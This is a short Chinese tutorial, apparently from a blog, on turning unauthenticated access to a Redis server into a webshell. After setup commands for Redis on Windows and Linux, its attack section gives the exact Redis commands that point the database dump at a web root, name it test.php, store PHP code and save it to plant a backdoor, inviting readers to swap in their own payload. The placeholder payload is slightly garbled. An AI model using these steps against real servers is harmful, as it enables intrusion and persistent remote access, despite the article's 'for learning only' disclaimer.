数据库服务类--Redis--未授权访问&终端Getshell

免责声明:本文仅做技术交流与学习.

目录

前提条件:

windows上开启redis服务:

Linux上创建&开启redis服务:

操作:

1-连接靶机redis

2-写入webshell

3-访问后门


redis--->webshell

Redis未授权访问漏洞复现与利用 - 知乎 (zhihu.com)

前提条件:

端口开放(6379)

目录结构清晰

windows上开启redis服务:

sql 复制代码
windows:
redis-server.exe redis.windows.conf
redis-cli.exe -h 127.0.0.1 -p 6379

Linux上创建&开启redis服务:

复制代码
复制代码
1、下载
wget http://download.redis.io/releases/redis-2.8.17.tar.gz
​
2、解压编译
tar xzvf redis-2.8.17.tar.gz  #解压安装包
cd redis-2.8.17  # 进入redis目录
make #编译
​
3、配置及启动
cd src/ #进入src目录 
cp redis-server /usr/bin/ 
cp redis-cli /usr/bin/      #将redis-server和redis-cli拷贝到/usr/bin目录下(这样启动redis-server和redis-cli就不用每次都进入安装目录了)
cd ..   # 返回上一级目录
cp redis.conf /etc/     #将redis.conf拷贝到/etc/目录下
redis-server /etc/redis.conf  # 使用/etc/目录下的redis.conf文件中的配置启动redis服务

操作:

1-连接靶机redis

2-写入webshell

sql 复制代码
config set dir /www/wwwroot/IP
config  set dbfilename test.php
set test "<?phpphpinfo();?>"
bgsave
save

目录,文件名自己改

写入内容自己改...

3-访问后门路径

--上线...


相关推荐
米小虾4 小时前
AI Agent 安全实战指南:当智能体开始"不听话",开发者该如何应对?
人工智能·安全·agent
这个DBA有点耶6 小时前
NULL不是空——数据库里最反直觉的设计,90%新人踩过的坑
数据库·mysql·代码规范
这个DBA有点耶8 小时前
AI写的SQL跑崩了生产库,这锅谁背?
数据库·人工智能·程序员
镜舟科技9 小时前
Databricks 再提 LTAP,AI 时代的数据底座为何重回大一统叙事?
数据库·架构·agent
Databend10 小时前
从湖仓升级为 Agent 时代的数据控制面,Snowflake 和 Databricks 有哪些布局
大数据·数据库·agent
ClouGence13 小时前
SQL Server CDC 能放到 Always On 备库读吗?一文讲透原理与实践
数据库·sql server
tntxia16 小时前
网络安全漏洞修复(一)
安全
先吃饱再说1 天前
存储的进化:从 MySQL 到浏览器缓存,数据到底住在哪?
数据库
Nturmoils1 天前
字段太多看不全,ksql 的展开模式和输出控制怎么用
数据库·后端
Databend1 天前
Agent 轨迹分析与归因的数据工程实践
大数据·数据库·agent